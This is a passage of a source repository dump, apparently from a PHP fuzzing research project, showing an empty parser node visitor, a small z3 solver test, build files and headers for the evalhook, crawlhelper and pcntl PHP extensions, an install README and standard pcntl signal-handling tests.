58 | 
59 |     }
60 | }
61 | ?>
62 | 


--------------------------------------------------------------------------------
/Fuzzer/inc/NormalNodeVisitor.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | use PhpParser\Node;
 3 | use PhpParser\NodeVisitorAbstract;
 4 | 
 5 | class NormalNodeVisitor extends NodeVisitorAbstract
 6 | {
 7 | 	public function beforeTraverse(array $nodes) {
 8 | 
 9 |     }
10 | 
11 | 	public function enterNode(Node $node) {
12 |     
13 |     }
14 | 	public function leaveNode(Node $node) {
15 |     
16 |     }
17 | 	public function afterTraverse(array $nodes) {
18 | 
19 |     }
20 | }
21 | ?>
22 | 


--------------------------------------------------------------------------------
/Fuzzer/solving_test.py:
--------------------------------------------------------------------------------
 1 | from z3 import *
 2 | 
 3 | ConstSolver = Solver()
 4 | x = Bool('x')
 5 | 
 6 | ConstSolver.add(x)
 7 | 
 8 | print(ConstSolver.check())
 9 | 
10 | '''
11 | # SMT Solve
12 | ConstModel = ConstSolver.model()
13 | for model_dec in ConstModel.decls():
14 |     print(model_dec.name(), ConstModel[model_dec])
15 | '''
16 | 


--------------------------------------------------------------------------------
/Lib/crawlhelper/config.m4:
--------------------------------------------------------------------------------
1 | PHP_ARG_ENABLE(crawlhelper, whether to enable evalhook support,
2 | [  --enable-crawlhelper           Enable evalhook support])
3 | 
4 | if test "$PHP_EVALHOOK" != "no"; then
5 |   PHP_NEW_EXTENSION(crawlhelper, crawlhelper.c, $ext_shared)
6 | fi
7 | 


--------------------------------------------------------------------------------
/Lib/crawlhelper/php_crawlhelper.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |   +----------------------------------------------------------------------+
 3 |   | PHP Version 5                                                        |
 4 |   +----------------------------------------------------------------------+
 5 |   | Copyright (c) 1997-2010 The PHP Group                                |
 6 |   +----------------------------------------------------------------------+
 7 |   | This source file is subject to version 3.01 of the PHP license,      |
 8 |   | that is bundled with this package in the file LICENSE, and is        |
 9 |   | available through the world-wide-web at the following url:           |
10 |   | http://www.php.net/license/3_01.txt                                  |
11 |   | If you did not receive a copy of the PHP license and are unable to   |
12 |   | obtain it through the world-wide-web, please send a note to          |
13 |   | license@php.net so we can mail you a copy immediately.               |
14 |   +----------------------------------------------------------------------+
15 |   | Author:                                                              |
16 |   +----------------------------------------------------------------------+
17 | */
18 | 
19 | /* $Id: header 297205 2010-03-30 21:09:07Z johannes $ */
20 | 
21 | #ifndef PHP_CRAWLHELPER_H
22 | #define PHP_CRAWLHELPER_H
23 | 
24 | extern zend_module_entry crawlhelper_module_entry;
25 | #define phpext_crawlhelper_ptr &crawlhelper_module_entry
26 | 
27 | #ifdef PHP_WIN32
28 | #	define PHP_crawlhelper_API __declspec(dllexport)
29 | #elif defined(__GNUC__) && __GNUC__ >= 4
30 | #	define PHP_crawlhelper_API __attribute__ ((visibility("default")))
31 | #else
32 | #	define PHP_crawlhelper_API
33 | #endif
34 | 
35 | #ifdef ZTS
36 | #include "TSRM.h"
37 | #endif
38 | 
39 | PHP_MINIT_FUNCTION(crawlhelper);
40 | PHP_MSHUTDOWN_FUNCTION(crawlhelper);
41 | PHP_RINIT_FUNCTION(crawlhelper);
42 | PHP_RSHUTDOWN_FUNCTION(crawlhelper);
43 | PHP_MINFO_FUNCTION(crawlhelper);
44 | 
45 | #ifdef ZTS
46 | #define CRAWLHELPER_G(v) TSRMG(crawlhelper_globals_id, zend_crawlhelper_globals *, v)
47 | #else
48 | #define CRAWLHELPER_G(v) (crawlhelper_globals.v)
49 | #endif
50 | 
51 | #endif	/* PHP_crawlhelper_H */
52 | 


--------------------------------------------------------------------------------
/Lib/evalhook/.deps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Lib/evalhook/.deps


--------------------------------------------------------------------------------
/Lib/evalhook/.libs/evalhook.la:
--------------------------------------------------------------------------------
1 | ../evalhook.la


--------------------------------------------------------------------------------
/Lib/evalhook/.libs/evalhook.lai:
--------------------------------------------------------------------------------
 1 | # evalhook.la - a libtool library file
 2 | # Generated by libtool (GNU libtool) 2.4.6 Debian-2.4.6-2
 3 | #
 4 | # Please DO NOT delete this file!
 5 | # It is necessary for linking the library.
 6 | 
 7 | # The name that we can dlopen(3).
 8 | dlname='evalhook.so'
 9 | 
10 | # Names of this library.
11 | library_names='evalhook.so evalhook.so evalhook.so'
12 | 
13 | # The name of the static archive.
14 | old_library=''
15 | 
16 | # Linker flags that cannot go in dependency_libs.
17 | inherited_linker_flags=''
18 | 
19 | # Libraries that this one depends upon.
20 | dependency_libs=''
21 | 
22 | # Names of additional weak libraries provided by this library
23 | weak_library_names=''
24 | 
25 | # Version information for evalhook.
26 | current=0
27 | age=0
28 | revision=0
29 | 
30 | # Is this an already installed library?
31 | installed=yes
32 | 
33 | # Should we warn about portability when linking against -modules?
34 | shouldnotlink=yes
35 | 
36 | # Files to dlopen/dlpreopen
37 | dlopen=''
38 | dlpreopen=''
39 | 
40 | # Directory that this library needs to be installed in:
41 | libdir='/new_point/Lib/evalhook/modules'
42 | 


--------------------------------------------------------------------------------
/Lib/evalhook/.libs/evalhook.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Lib/evalhook/.libs/evalhook.o


--------------------------------------------------------------------------------
/Lib/evalhook/.libs/evalhook.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Lib/evalhook/.libs/evalhook.so


--------------------------------------------------------------------------------
/Lib/evalhook/README.md:
--------------------------------------------------------------------------------
 1 | # evalhook
 2 | Stefan Esser
 3 | 
 4 | # How to install
 5 | ## On Debian/Ubuntu
 6 | 
 7 | ```
 8 | sudo apt-get install php5-dev build-essential git
 9 | git clone https://github.com/unreturned/evalhook
10 | cd evalhook
11 | phpize
12 | ./configure
13 | make
14 | sudo make install
15 | ```
16 | 
17 | # How to use
18 | 
19 | ```
20 | php -d extension=evalhook.so file.php
21 | ```
22 | 


--------------------------------------------------------------------------------
/Lib/evalhook/config.m4:
--------------------------------------------------------------------------------
1 | PHP_ARG_ENABLE(evalhook, whether to enable evalhook support,
2 | [  --enable-evalhook           Enable evalhook support])
3 | 
4 | if test "$PHP_EVALHOOK" != "no"; then
5 |   PHP_NEW_EXTENSION(evalhook, evalhook.c, $ext_shared)
6 | fi
7 | 


--------------------------------------------------------------------------------
/Lib/evalhook/php_evalhook.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |   +----------------------------------------------------------------------+
 3 |   | PHP Version 5                                                        |
 4 |   +----------------------------------------------------------------------+
 5 |   | Copyright (c) 1997-2010 The PHP Group                                |
 6 |   +----------------------------------------------------------------------+
 7 |   | This source file is subject to version 3.01 of the PHP license,      |
 8 |   | that is bundled with this package in the file LICENSE, and is        |
 9 |   | available through the world-wide-web at the following url:           |
10 |   | http://www.php.net/license/3_01.txt                                  |
11 |   | If you did not receive a copy of the PHP license and are unable to   |
12 |   | obtain it through the world-wide-web, please send a note to          |
13 |   | license@php.net so we can mail you a copy immediately.               |
14 |   +----------------------------------------------------------------------+
15 |   | Author:                                                              |
16 |   +----------------------------------------------------------------------+
17 | */
18 | 
19 | /* $Id: header 297205 2010-03-30 21:09:07Z johannes $ */
20 | 
21 | #ifndef PHP_EVALHOOK_H
22 | #define PHP_EVALHOOK_H
23 | 
24 | extern zend_module_entry evalhook_module_entry;
25 | #define phpext_evalhook_ptr &evalhook_module_entry
26 | 
27 | #ifdef PHP_WIN32
28 | #	define PHP_EVALHOOK_API __declspec(dllexport)
29 | #elif defined(__GNUC__) && __GNUC__ >= 4
30 | #	define PHP_EVALHOOK_API __attribute__ ((visibility("default")))
31 | #else
32 | #	define PHP_EVALHOOK_API
33 | #endif
34 | 
35 | #ifdef ZTS
36 | #include "TSRM.h"
37 | #endif
38 | 
39 | PHP_MINIT_FUNCTION(evalhook);
40 | PHP_MSHUTDOWN_FUNCTION(evalhook);
41 | PHP_RINIT_FUNCTION(evalhook);
42 | PHP_RSHUTDOWN_FUNCTION(evalhook);
43 | PHP_MINFO_FUNCTION(evalhook);
44 | 
45 | #ifdef ZTS
46 | #define EVALHOOK_G(v) TSRMG(evalhook_globals_id, zend_evalhook_globals *, v)
47 | #else
48 | #define EVALHOOK_G(v) (evalhook_globals.v)
49 | #endif
50 | 
51 | #endif	/* PHP_EVALHOOK_H */
52 | 


--------------------------------------------------------------------------------
/Lib/evalhook7/.libs/evalhook.la:
--------------------------------------------------------------------------------
1 | ../evalhook.la


--------------------------------------------------------------------------------
/Lib/evalhook7/.libs/evalhook.lai:
--------------------------------------------------------------------------------
 1 | # evalhook.la - a libtool library file
 2 | # Generated by libtool (GNU libtool) 2.4.6 Debian-2.4.6-2
 3 | #
 4 | # Please DO NOT delete this file!
 5 | # It is necessary for linking the library.
 6 | 
 7 | # The name that we can dlopen(3).
 8 | dlname='evalhook.so'
 9 | 
10 | # Names of this library.
11 | library_names='evalhook.so evalhook.so evalhook.so'
12 | 
13 | # The name of the static archive.
14 | old_library=''
15 | 
16 | # Linker flags that cannot go in dependency_libs.
17 | inherited_linker_flags=''
18 | 
19 | # Libraries that this one depends upon.
20 | dependency_libs=''
21 | 
22 | # Names of additional weak libraries provided by this library
23 | weak_library_names=''
24 | 
25 | # Version information for evalhook.
26 | current=0
27 | age=0
28 | revision=0
29 | 
30 | # Is this an already installed library?
31 | installed=yes
32 | 
33 | # Should we warn about portability when linking against -modules?
34 | shouldnotlink=yes
35 | 
36 | # Files to dlopen/dlpreopen
37 | dlopen=''
38 | dlpreopen=''
39 | 
40 | # Directory that this library needs to be installed in:
41 | libdir='/new_point/Lib/evalhook7/modules'
42 | 


--------------------------------------------------------------------------------
/Lib/evalhook7/.libs/evalhook.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Lib/evalhook7/.libs/evalhook.o


--------------------------------------------------------------------------------
/Lib/evalhook7/.libs/evalhook.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Lib/evalhook7/.libs/evalhook.so


--------------------------------------------------------------------------------
/Lib/evalhook7/README.md:
--------------------------------------------------------------------------------
 1 | # evalhook
 2 | Stefan Esser
 3 | 
 4 | # How to install
 5 | ## On Debian/Ubuntu
 6 | 
 7 | ```
 8 | sudo apt-get install php5-dev build-essential git
 9 | git clone https://github.com/unreturned/evalhook
10 | cd evalhook
11 | phpize
12 | ./configure
13 | make
14 | sudo make install
15 | ```
16 | 
17 | # How to use
18 | 
19 | ```
20 | php -d extension=evalhook.so file.php
21 | ```
22 | 


--------------------------------------------------------------------------------
/Lib/evalhook7/config.m4:
--------------------------------------------------------------------------------
1 | PHP_ARG_ENABLE(evalhook, whether to enable evalhook support,
2 | [  --enable-evalhook           Enable evalhook support])
3 | 
4 | if test "$PHP_EVALHOOK" != "no"; then
5 |   PHP_NEW_EXTENSION(evalhook, evalhook.c, $ext_shared)
6 | fi
7 | 


--------------------------------------------------------------------------------
/Lib/evalhook7/php_evalhook.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |   +----------------------------------------------------------------------+
 3 |   | PHP Version 5                                                        |
 4 |   +----------------------------------------------------------------------+
 5 |   | Copyright (c) 1997-2010 The PHP Group                                |
 6 |   +----------------------------------------------------------------------+
 7 |   | This source file is subject to version 3.01 of the PHP license,      |
 8 |   | that is bundled with this package in the file LICENSE, and is        |
 9 |   | available through the world-wide-web at the following url:           |
10 |   | http://www.php.net/license/3_01.txt                                  |
11 |   | If you did not receive a copy of the PHP license and are unable to   |
12 |   | obtain it through the world-wide-web, please send a note to          |
13 |   | license@php.net so we can mail you a copy immediately.               |
14 |   +----------------------------------------------------------------------+
15 |   | Author:                                                              |
16 |   +----------------------------------------------------------------------+
17 | */
18 | 
19 | /* $Id: header 297205 2010-03-30 21:09:07Z johannes $ */
20 | 
21 | #ifndef PHP_EVALHOOK_H
22 | #define PHP_EVALHOOK_H
23 | 
24 | extern zend_module_entry evalhook_module_entry;
25 | #define phpext_evalhook_ptr &evalhook_module_entry
26 | 
27 | #ifdef PHP_WIN32
28 | #	define PHP_EVALHOOK_API __declspec(dllexport)
29 | #elif defined(__GNUC__) && __GNUC__ >= 4
30 | #	define PHP_EVALHOOK_API __attribute__ ((visibility("default")))
31 | #else
32 | #	define PHP_EVALHOOK_API
33 | #endif
34 | 
35 | #ifdef ZTS
36 | #include "TSRM.h"
37 | #endif
38 | 
39 | PHP_MINIT_FUNCTION(evalhook);
40 | PHP_MSHUTDOWN_FUNCTION(evalhook);
41 | PHP_RINIT_FUNCTION(evalhook);
42 | PHP_RSHUTDOWN_FUNCTION(evalhook);
43 | PHP_MINFO_FUNCTION(evalhook);
44 | 
45 | #ifdef ZTS
46 | #define EVALHOOK_G(v) TSRMG(evalhook_globals_id, zend_evalhook_globals *, v)
47 | #else
48 | #define EVALHOOK_G(v) (evalhook_globals.v)
49 | #endif
50 | 
51 | #endif	/* PHP_EVALHOOK_H */
52 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/CREDITS:
--------------------------------------------------------------------------------
1 | pcntl
2 | Jason Greene, Arnaud Le Blanc
3 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/README:
--------------------------------------------------------------------------------
 1 | Process Control Module for PHP (pcntl)
 2 | 
 3 | This module will attempt to implement all features related to process spawning and
 4 | control (fork(), waitpid(), signal(), WIF's, etc). This is extremly experimental, 
 5 | with hope to become stable on most UNIX's. I greatly apreciate any feedback, fixes, 
 6 | and or suggestions on how to improve/better implement
 7 | this functionality.
 8 | 
 9 | Thanks,
10 | 
11 | Jason Greeme < jason@inetgurus.net / jason@php.net >
12 | 
13 | 
14 | 
15 | 
16 | 
17 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/config.m4:
--------------------------------------------------------------------------------
 1 | dnl
 2 | dnl $Id$
 3 | dnl
 4 | 
 5 | PHP_ARG_ENABLE(pcntl, whether to enable pcntl support,
 6 | [  --enable-pcntl          Enable pcntl support (CLI/CGI only)])
 7 | 
 8 | if test "$PHP_PCNTL" != "no"; then
 9 |   AC_CHECK_FUNCS(fork, [ AC_DEFINE(HAVE_FORK,1,[ ]) ], [ AC_MSG_ERROR(pcntl: fork() not supported by this platform) ])
10 |   AC_CHECK_FUNCS(waitpid, [ AC_DEFINE(HAVE_WAITPID,1,[ ]) ], [ AC_MSG_ERROR(pcntl: waitpid() not supported by this platform) ])
11 |   AC_CHECK_FUNCS(sigaction, [ AC_DEFINE(HAVE_SIGACTION,1,[ ]) ], [ AC_MSG_ERROR(pcntl: sigaction() not supported by this platform) ])
12 |   AC_CHECK_FUNCS([getpriority setpriority wait3 sigprocmask sigwaitinfo sigtimedwait])
13 |   PHP_NEW_EXTENSION(pcntl, pcntl.c php_signal.c, $ext_shared, cli)
14 | fi
15 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/package.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Lib/pcntl54/package.xml


--------------------------------------------------------------------------------
/Lib/pcntl54/php_pcntl.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |    +----------------------------------------------------------------------+
 3 |    | PHP Version 5                                                        |
 4 |    +----------------------------------------------------------------------+
 5 |    | Copyright (c) 1997-2014 The PHP Group                                |
 6 |    +----------------------------------------------------------------------+
 7 |    | This source file is subject to version 3.01 of the PHP license,      |
 8 |    | that is bundled with this package in the file LICENSE, and is        |
 9 |    | available through the world-wide-web at the following url:           |
10 |    | http://www.php.net/license/3_01.txt                                  |
11 |    | If you did not receive a copy of the PHP license and are unable to   |
12 |    | obtain it through the world-wide-web, please send a note to          |
13 |    | license@php.net so we can mail you a copy immediately.               |
14 |    +----------------------------------------------------------------------+
15 |    | Author: Jason Greene <jason@inetgurus.net>                           |
16 |    +----------------------------------------------------------------------+
17 |  */
18 | 
19 | /* $Id$ */
20 | 
21 | #ifndef PHP_PCNTL_H
22 | #define PHP_PCNTL_H
23 | 
24 | extern zend_module_entry pcntl_module_entry;
25 | #define phpext_pcntl_ptr &pcntl_module_entry
26 | 
27 | PHP_MINIT_FUNCTION(pcntl);
28 | PHP_MSHUTDOWN_FUNCTION(pcntl);
29 | PHP_RINIT_FUNCTION(pcntl);
30 | PHP_RSHUTDOWN_FUNCTION(pcntl);
31 | PHP_MINFO_FUNCTION(pcntl);
32 | 
33 | PHP_FUNCTION(pcntl_alarm);
34 | PHP_FUNCTION(pcntl_fork);
35 | PHP_FUNCTION(pcntl_waitpid);
36 | PHP_FUNCTION(pcntl_wait);
37 | PHP_FUNCTION(pcntl_wifexited);
38 | PHP_FUNCTION(pcntl_wifstopped);
39 | PHP_FUNCTION(pcntl_wifsignaled);
40 | PHP_FUNCTION(pcntl_wexitstatus);
41 | PHP_FUNCTION(pcntl_wtermsig);
42 | PHP_FUNCTION(pcntl_wstopsig);
43 | PHP_FUNCTION(pcntl_signal);
44 | PHP_FUNCTION(pcntl_signal_dispatch);
45 | PHP_FUNCTION(pcntl_get_last_error);
46 | PHP_FUNCTION(pcntl_strerror);
47 | #ifdef HAVE_SIGPROCMASK
48 | PHP_FUNCTION(pcntl_sigprocmask);
49 | #endif
50 | #if HAVE_SIGWAITINFO && HAVE_SIGTIMEDWAIT
51 | PHP_FUNCTION(pcntl_sigwaitinfo);
52 | PHP_FUNCTION(pcntl_sigtimedwait);
53 | #endif
54 | PHP_FUNCTION(pcntl_exec);
55 | #ifdef HAVE_GETPRIORITY
56 | PHP_FUNCTION(pcntl_getpriority);
57 | #endif
58 | #ifdef HAVE_SETPRIORITY
59 | PHP_FUNCTION(pcntl_setpriority);
60 | #endif
61 | 
62 | struct php_pcntl_pending_signal {
63 | 	struct php_pcntl_pending_signal *next;
64 | 	long signo;
65 | };
66 | 
67 | ZEND_BEGIN_MODULE_GLOBALS(pcntl)
68 | 	HashTable php_signal_table;
69 | 	int processing_signal_queue;
70 | 	struct php_pcntl_pending_signal *head, *tail, *spares;
71 | 	int last_error;
72 | ZEND_END_MODULE_GLOBALS(pcntl)
73 | 
74 | #ifdef ZTS
75 | #define PCNTL_G(v) TSRMG(pcntl_globals_id, zend_pcntl_globals *, v)
76 | #else
77 | #define PCNTL_G(v)	(pcntl_globals.v)
78 | #endif
79 | 
80 | #define REGISTER_PCNTL_ERRNO_CONSTANT(name) REGISTER_LONG_CONSTANT("PCNTL_" #name, name, CONST_CS | CONST_PERSISTENT)
81 | 
82 | #endif	/* PHP_PCNTL_H */
83 | 
84 | 
85 | /*
86 |  * Local variables:
87 |  * tab-width: 4
88 |  * c-basic-offset: 4
89 |  * indent-tabs-mode: t
90 |  * End:
91 |  */
92 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/php_signal.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |    +----------------------------------------------------------------------+
 3 |    | PHP Version 5                                                        |
 4 |    +----------------------------------------------------------------------+
 5 |    | Copyright (c) 1997-2014 The PHP Group                                |
 6 |    +----------------------------------------------------------------------+
 7 |    | This source file is subject to version 3.01 of the PHP license,      |
 8 |    | that is bundled with this package in the file LICENSE, and is        |
 9 |    | available through the world-wide-web at the following url:           |
10 |    | http://www.php.net/license/3_01.txt                                  |
11 |    | If you did not receive a copy of the PHP license and are unable to   |
12 |    | obtain it through the world-wide-web, please send a note to          |
13 |    | license@php.net so we can mail you a copy immediately.               |
14 |    +----------------------------------------------------------------------+
15 |    | Author: Jason Greene <jason@inetgurus.net>                           |
16 |    +----------------------------------------------------------------------+
17 | */
18 | 
19 | /* $Id$ */
20 | 
21 | #include "TSRM.h"
22 | #include "php_signal.h"
23 | #include "Zend/zend.h"
24 | #include "Zend/zend_signal.h"
25 | 
26 | /* php_signal using sigaction is derived from Advanced Programing
27 |  * in the Unix Environment by W. Richard Stevens p 298. */
28 | Sigfunc *php_signal4(int signo, Sigfunc *func, int restart, int mask_all)
29 | {
30 | 	struct sigaction act,oact;
31 | #ifdef ZEND_SIGNALS
32 | 	TSRMLS_FETCH();
33 | #endif
34 | 	act.sa_handler = func;
35 | 
36 | 	if (mask_all) {
37 | 		sigfillset(&act.sa_mask);
38 | 	} else {
39 | 		sigemptyset(&act.sa_mask);
40 | 	}
41 | 	act.sa_flags = 0;
42 | 	if (signo == SIGALRM || (! restart)) {
43 | #ifdef SA_INTERRUPT
44 | 		act.sa_flags |= SA_INTERRUPT; /* SunOS */
45 | #endif
46 | 	} else {
47 | #ifdef SA_RESTART
48 | 		act.sa_flags |= SA_RESTART; /* SVR4, 4.3+BSD */
49 | #endif
50 | 	}
51 | #ifdef ZEND_SIGNALS
52 | 	if (zend_sigaction(signo, &act, &oact TSRMLS_CC) < 0)
53 | #else
54 | 	if (sigaction(signo, &act, &oact) < 0)
55 | #endif
56 | 	{
57 | 		return SIG_ERR;
58 | 	}
59 | 
60 | 	return oact.sa_handler;
61 | }
62 | 
63 | Sigfunc *php_signal(int signo, Sigfunc *func, int restart)
64 | {
65 | 	return php_signal4(signo, func, restart, 0);
66 | }
67 | 
68 | /*
69 |  * Local variables:
70 |  * tab-width: 4
71 |  * c-basic-offset: 4
72 |  * End:
73 |  * vim600: noet sw=4 ts=4 fdm=marker
74 |  * vim<600: noet sw=4 ts=4
75 |  */
76 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/php_signal.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |    +----------------------------------------------------------------------+
 3 |    | PHP Version 5                                                        |
 4 |    +----------------------------------------------------------------------+
 5 |    | Copyright (c) 1997-2014 The PHP Group                                |
 6 |    +----------------------------------------------------------------------+
 7 |    | This source file is subject to version 3.01 of the PHP license,      |
 8 |    | that is bundled with this package in the file LICENSE, and is        |
 9 |    | available through the world-wide-web at the following url:           |
10 |    | http://www.php.net/license/3_01.txt                                  |
11 |    | If you did not receive a copy of the PHP license and are unable to   |
12 |    | obtain it through the world-wide-web, please send a note to          |
13 |    | license@php.net so we can mail you a copy immediately.               |
14 |    +----------------------------------------------------------------------+
15 |    | Author: Jason Greene <jason@inetgurus.net>                           |
16 |    +----------------------------------------------------------------------+
17 | */
18 | 
19 | /* $Id$ */
20 | 
21 | #include <signal.h>
22 | #ifndef PHP_SIGNAL_H
23 | #define PHP_SIGNAL_H
24 | 
25 | #ifndef NSIG
26 | # define NSIG 32
27 | #endif
28 | #ifndef SIGRTMAX
29 | # define SIGRTMAX 64
30 | #endif
31 | 
32 | typedef void Sigfunc(int);
33 | Sigfunc *php_signal(int signo, Sigfunc *func, int restart);
34 | Sigfunc *php_signal4(int signo, Sigfunc *func, int restart, int mask_all);
35 | 
36 | #endif
37 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/test-pcntl.php:
--------------------------------------------------------------------------------
 1 | #!../../php -q
 2 | <?
 3 | 
 4 | declare(ticks=1);
 5 | 
 6 | function alarm_handle($signal){
 7 | 	 if ($signal==SIGALRM) print "Child: Caught SIGALRM!!!\n";
 8 | }
 9 | 
10 | function usr1_handle($signal){
11 | 	if ($signal==SIGUSR1) print "Child: Caught SIGUSR1!!!\n";
12 | }
13 | 
14 | print "This test will demonstrate a fork followed by ipc via signals.\n";
15 | 
16 | $pid=pcntl_fork();
17 | if ($pid==0) {
18 | 	pcntl_signal(SIGUSR1, "usr1_handle");
19 | 	pcntl_signal(SIGALRM, "alarm_handle");
20 | 	print "Child: Waiting for alarm.....\n";
21 | 	sleep(100);
22 | 	print "Child: Waiting for usr1......\n";
23 | 	sleep(100);
24 | 	print "Child: Resetting Alarm handler to Ignore....\n";
25 | 	pcntl_signal(SIGALRM, SIG_IGN);
26 | 	print "Child: sleeping for 10 seconds....\n";
27 | 	sleep(10);
28 | 	print "Done\n";
29 | } else {
30 | 	print "Parent: Waiting 10 seconds....\n";
31 | 	sleep(10);
32 | 	print "Parent: Sending SIGALRM to Child\n";
33 | 	posix_kill($pid,SIGALRM);
34 | 	sleep(1);
35 | 	print "Parent: Senging SIGUSR1 to Child\n";
36 | 	posix_kill($pid,SIGUSR1);
37 | 	sleep(2);
38 | 	print "Parent: Sending SIGALRM to Child\n";
39 | 	pcntl_waitpid($pid, &$status, $options);
40 | }
41 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/001.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test pcntl wait functionality
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip"; 
 6 | 	elseif (!function_exists("posix_kill")) print "skip posix_kill() not available";
 7 | ?>
 8 | --FILE--
 9 | <?php 
10 | function test_exit_waits(){
11 | 	print "\n\nTesting pcntl_wifexited and wexitstatus....";
12 | 
13 | 	$pid=pcntl_fork();
14 | 	if ($pid==0) {
15 | 		sleep(1);
16 | 		exit(-1);
17 | 	} else {
18 | 		$options=0;
19 | 		pcntl_waitpid($pid, $status, $options);
20 | 		if ( pcntl_wifexited($status) ) print "\nExited With: ". pcntl_wexitstatus($status);
21 | 	}
22 | }
23 | 
24 | function test_exit_signal(){
25 | 	print "\n\nTesting pcntl_wifsignaled....";
26 | 
27 | 	$pid=pcntl_fork();
28 |     
29 | 	if ($pid==0) {
30 | 		sleep(10);
31 | 		exit;
32 | 	} else {
33 | 		$options=0;
34 | 		posix_kill($pid, SIGTERM);
35 | 		pcntl_waitpid($pid, $status, $options);
36 | 		if ( pcntl_wifsignaled($status) ) {
37 | 			$signal_print=pcntl_wtermsig($status);
38 | 			if ($signal_print==SIGTERM) $signal_print="SIGTERM";
39 | 			print "\nProcess was terminated by signal : ". $signal_print;
40 | 		}
41 | 
42 | 	}
43 | }
44 | 
45 | 
46 | function test_stop_signal(){
47 | 	print "\n\nTesting pcntl_wifstopped and pcntl_wstopsig....";
48 | 
49 | 	$pid=pcntl_fork();
50 |     
51 | 	if ($pid==0) {
52 | 		sleep(1);
53 | 		exit;
54 | 	} else {
55 | 		$options=WUNTRACED;
56 | 		posix_kill($pid, SIGSTOP);
57 | 		pcntl_waitpid($pid, $status, $options);
58 | 		if ( pcntl_wifstopped($status) ) {
59 | 			$signal_print=pcntl_wstopsig($status);
60 | 			if ($signal_print==SIGSTOP) $signal_print="SIGSTOP";
61 | 			print "\nProcess was stoped by signal : ". $signal_print;
62 | 		}
63 | 		posix_kill($pid, SIGCONT);
64 | 	}
65 | }
66 | 
67 | print "Staring wait.h tests....";
68 | test_exit_waits();
69 | test_exit_signal();
70 | test_stop_signal();
71 | ?>
72 | --EXPECT--
73 | Staring wait.h tests....
74 | 
75 | Testing pcntl_wifexited and wexitstatus....
76 | Exited With: 255
77 | 
78 | Testing pcntl_wifsignaled....
79 | Process was terminated by signal : SIGTERM
80 | 
81 | Testing pcntl_wifstopped and pcntl_wstopsig....
82 | Process was stoped by signal : SIGSTOP
83 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/002.phpt:
--------------------------------------------------------------------------------
  1 | --TEST--
  2 | pcntl: pcntl_sigprocmask(), pcntl_sigwaitinfo(), pcntl_sigtimedwait()
  3 | --SKIPIF--
  4 | <?php
  5 | 	if (!extension_loaded('pcntl')) die('skip pcntl extension not available');
  6 | 	elseif (!extension_loaded('posix')) die('skip posix extension not available');
  7 | 	elseif (!function_exists('pcntl_sigwaitinfo') or !function_exists('pcntl_sigtimedwait')) die('skip required functionality is not available');
  8 | 	elseif (!defined('CLD_EXITED')) die('skip CLD_EXITED not defined');
  9 | ?>
 10 | --FILE--
 11 | <?php
 12 | 
 13 | $pid = pcntl_fork();
 14 | if ($pid == -1) {
 15 | 	die('failed');
 16 | } else if ($pid) {
 17 | 	pcntl_sigprocmask(SIG_BLOCK, array(SIGCHLD,(string)SIGTERM));
 18 | 	$oldset = array();
 19 | 	pcntl_sigprocmask(SIG_BLOCK, array(), $oldset);
 20 | 	var_dump(in_array(SIGCHLD, $oldset));
 21 | 	var_dump(in_array(SIGTERM, $oldset));
 22 | 
 23 | 	posix_kill(posix_getpid(), SIGTERM);
 24 | 	$signo = pcntl_sigwaitinfo(array(SIGTERM), $siginfo);
 25 | 	echo "signo == SIGTERM\n";
 26 | 	var_dump($signo === SIGTERM && $signo === $siginfo['signo']);
 27 | 	echo "code === SI_USER || SI_NOINFO\n";
 28 | 	if (defined('SI_NOINFO')) {
 29 | 		var_dump(($siginfo['code'] === SI_USER) || ($siginfo['code'] === SI_NOINFO));
 30 | 	} else {
 31 | 		var_dump($siginfo['code'] === SI_USER);
 32 | 	}
 33 | 
 34 | 	pcntl_signal(SIGCHLD, function($signo){});
 35 | 	posix_kill($pid, SIGTERM);
 36 | 	$signo = pcntl_sigwaitinfo(array((string)SIGCHLD), $siginfo);
 37 | 	echo "signo == SIGCHLD\n";
 38 | 	var_dump($signo === SIGCHLD && $signo === $siginfo['signo']);
 39 | 	echo "code === CLD_KILLED\n";
 40 | 	var_dump($siginfo['code'] === CLD_KILLED);
 41 | 	echo "signo === SIGCHLD\n";
 42 | 	var_dump($siginfo['signo'] === SIGCHLD);
 43 | 	echo "signo === uid\n";
 44 | 	var_dump($siginfo['uid'] === posix_getuid());
 45 | 	echo "signo === pid\n";
 46 | 	var_dump($siginfo['pid'] === $pid);
 47 | 	pcntl_waitpid($pid, $status);
 48 | 
 49 | 	set_error_handler(function($errno, $errstr) { echo "Error triggered\n"; }, E_WARNING);
 50 | 
 51 | 	echo "sigprocmask with invalid arguments\n";
 52 | 
 53 | 	/* Valgrind expectedly complains about this:
 54 |          * "sigprocmask: unknown 'how' field 2147483647"
 55 | 	 * Skip */
